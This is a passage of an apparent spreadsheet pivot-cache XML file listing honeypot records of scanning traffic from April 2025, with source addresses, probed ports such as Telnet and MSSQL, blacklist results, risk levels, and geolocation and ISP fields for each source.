    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5bb:8507"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1900"/>
    <x v="1900"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T06:25:19"/>
    <d v="2025-04-13T18:52:36"/>
    <d v="2025-04-14T06:25:19"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cf:ace2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1901"/>
    <x v="1901"/>
    <s v="114-35-96-179.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T06:11:04"/>
    <d v="2023-12-15T03:31:18"/>
    <d v="2025-04-14T06:11:04"/>
    <n v="211409"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H26&amp;&amp;SMA-LAB_SSH_H19&amp;&amp;SMA-LAB_HTTPS_H24&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H33"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;22&amp;&amp;443&amp;&amp;80&amp;&amp;64168&amp;&amp;23&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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7223:60b3"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1902"/>
    <x v="1902"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T06:11:00"/>
    <d v="2024-02-02T20:23:00"/>
    <d v="2025-04-14T06:11:00"/>
    <n v="217"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;40009&amp;&amp;23&amp;&amp;32772&amp;&amp;NA&amp;&amp;46408"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="Kolkata"/>
    <s v="Kolkata (Balaka Natun Bazar)"/>
    <s v="1275004"/>
    <s v="700052"/>
    <s v="22.6412"/>
    <s v="88.4075"/>
    <s v="135872"/>
    <s v="GTPL KCBPL BROADBAND PVT LTD"/>
    <s v="Gtpl Kcbpl Broadband PVT LTD"/>
    <s v="residential"/>
    <s v="Gtpl Kcbpl Broadband PVT LTD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a0ee:5fe5"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1903"/>
    <x v="1903"/>
    <s v="138-204-69-248.wantel.net.br&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T05:55:23"/>
    <d v="2025-04-13T23:43:19"/>
    <d v="2025-04-14T05:55:23"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="BA"/>
    <s v="Bahia"/>
    <s v="Serrinha"/>
    <s v="Serrinha"/>
    <s v="3447690"/>
    <s v="NA"/>
    <s v="-11.6642"/>
    <s v="-39.0075"/>
    <s v="263880"/>
    <s v="WANTEL TECNOLOGIA LTDA. ­ EPP"/>
    <s v="WANTEL TECNOLOGIA LTDA. ­ EPP"/>
    <s v="business"/>
    <s v="WANTEL TECNOLOGIA LTDA. ­ EPP"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8acc:45f8"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1904"/>
    <x v="1904"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T05:54:11"/>
    <d v="2025-04-14T05:54:11"/>
    <d v="2025-04-14T05:54:11"/>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d6:4cff"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1905"/>
    <x v="1905"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T05:25:14"/>
    <d v="2025-04-14T05:25:14"/>
    <d v="2025-04-14T05:25:14"/>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f:2189"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1906"/>
    <x v="1906"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T05:23:46"/>
    <d v="2025-04-14T05:00:48"/>
    <d v="2025-04-14T05:23:46"/>
    <n v="25"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d7:37fa"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1907"/>
    <x v="1907"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T05:04:52"/>
    <d v="2025-04-14T05:04:11"/>
    <d v="2025-04-14T05:04:52"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="MY"/>
    <s v="Malaysia"/>
    <s v="14"/>
    <s v="Kuala Lumpur"/>
    <s v="WP. Kuala Lumpur"/>
    <s v="Kuala Lumpur (Kampung Attap)"/>
    <s v="1735161"/>
    <s v="50460"/>
    <s v="3.13696"/>
    <s v="101.694"/>
    <s v="4788"/>
    <s v="TM TECHNOLOGY SERVICES SDN BHD"/>
    <s v="TM TECHNOLOGY SERVICES SDN BHD"/>
    <s v="residential"/>
    <s v="Adsl Streamyx"/>
    <s v="2004-06-07"/>
    <s v="ADSL-STREAMYX"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3c31:4061"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1908"/>
    <x v="1908"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T04:59:09"/>
    <d v="2025-04-14T04:59:09"/>
    <d v="2025-04-14T04:59:09"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Chennai"/>
    <s v="Chennai"/>
    <s v="1264527"/>
    <s v="600001"/>
    <s v="13.0827"/>
    <s v="80.2707"/>
    <s v="150151"/>
    <s v="EGI-AS-AP"/>
    <s v="Evergreen Internet"/>
    <s v="corporate"/>
    <s v="Internet Bangla Network"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:674c:99b9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1909"/>
    <x v="1909"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T04:46:15"/>
    <d v="2025-02-22T11:18:41"/>
    <d v="2025-04-14T04:46:15"/>
    <n v="33"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="1433&amp;&amp;3306&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Tiruchirappalli"/>
    <s v="Kāttupputtūr"/>
    <s v="1267428"/>
    <s v="NA"/>
    <s v="10.9938"/>
    <s v="78.2193"/>
    <s v="58898"/>
    <s v="Rainbow communications India Pvt Ltd"/>
    <s v="Rainbow communications India Pvt Ltd"/>
    <s v="business"/>
    <s v="Sangakpm"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (103.93.106.134,58370)}&amp;&amp;{Data_SMB:Incoming connection (103.93.106.134,59309)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:675d:6a86"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1910"/>
    <x v="1910"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T04:18:40"/>
    <d v="2025-04-14T04:18:40"/>
    <d v="2025-04-14T04:18:40"/>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3:a566"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1911"/>
    <x v="1911"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T04:18:13"/>
    <d v="2025-04-13T12:33:44"/>
    <d v="2025-04-14T04:18:13"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Salem"/>
    <s v="Omalur"/>
    <s v="1261049"/>
    <s v="NA"/>
    <s v="11.741"/>
    <s v="78.0456"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2008-03-19"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7838:e9dc"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1912"/>
    <x v="1912"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T04:15:31"/>
    <d v="2025-04-13T21:21:24"/>
    <d v="2025-04-14T04:15:31"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cd:98f3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1913"/>
    <x v="1913"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T03:33:06"/>
    <d v="2025-04-14T03:33:06"/>
    <d v="2025-04-14T03:33:06"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="MV"/>
    <s v="Maldives"/>
    <s v="14"/>
    <s v="Faafu Atholhu"/>
    <s v="NA"/>
    <s v="Nilandhoo"/>
    <s v="12494177"/>
    <s v="NA"/>
    <s v="3.05667"/>
    <s v="72.89"/>
    <s v="7642"/>
    <s v="DHIRAAGU-MV-AP"/>
    <s v="Dhiraagu Pvt.Ltd"/>
    <s v="corporate"/>
    <s v="Dhiraagu"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d1d4:dfb7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1914"/>
    <x v="1914"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T03:29:54"/>
    <d v="2025-04-14T03:29:54"/>
    <d v="2025-04-14T03:29:54"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="Kartal"/>
    <s v="Pendik"/>
    <s v="740616"/>
    <s v="NA"/>
    <s v="40.8994"/>
    <s v="29.2108"/>
    <s v="16135"/>
    <s v="TURKCELL-AS"/>
    <s v="Turkcell Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b05b:d84a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1915"/>
    <x v="1915"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T03:24:58"/>
    <d v="2025-04-14T03:24:58"/>
    <d v="2025-04-14T03:24:58"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taipei"/>
    <s v="New Taipei"/>
    <s v="Yingge District"/>
    <s v="1665491"/>
    <s v="NA"/>
    <s v="24.9622"/>
    <s v="121.331"/>
    <s v="9416"/>
    <s v="MULTIMEDIA-AS-AP"/>
    <s v="Hoshin Multimedia Center Inc."/>
    <s v="consumer"/>
    <s v="Hoshin Multimedia Center Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cbcc:ea9f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1916"/>
    <x v="1916"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T02:55:21"/>
    <d v="2025-04-14T02:55:21"/>
    <d v="2025-04-14T02:55:21"/>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d6:4111"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1917"/>
    <x v="1917"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T02:40:06"/>
    <d v="2025-04-14T02:40:06"/>
    <d v="2025-04-14T02:40:06"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PY"/>
    <s v="Puducherry"/>
    <s v="Karaikal"/>
    <s v="Karaikal"/>
    <s v="1267887"/>
    <s v="NA"/>
    <s v="10.9167"/>
    <s v="79.8333"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7838:5ce2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1918"/>
    <x v="1918"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T02:15:59"/>
    <d v="2025-04-13T15:16:51"/>
    <d v="2025-04-14T02:15:59"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c5:b9c8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1919"/>
    <x v="1919"/>
    <s v="NA&amp;&amp;014136181155.ctinets.com"/>
    <x v="0"/>
    <d v="2025-04-14T02:14:35"/>
    <d v="2025-04-05T13:29:04"/>
    <d v="2025-04-14T02:14:35"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NKT"/>
    <s v="Kwai Tsing"/>
    <s v="NA"/>
    <s v="Kwai Chung"/>
    <s v="1819595"/>
    <s v="NA"/>
    <s v="22.3702"/>
    <s v="114.13"/>
    <s v="9269"/>
    <s v="Hong Kong Broadband Network Ltd"/>
    <s v="Hong Kong Broadband Network Ltd"/>
    <s v="residential"/>
    <s v="Hong Kong Broadband Network Ltd"/>
    <s v="None"/>
    <s v="HKBN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
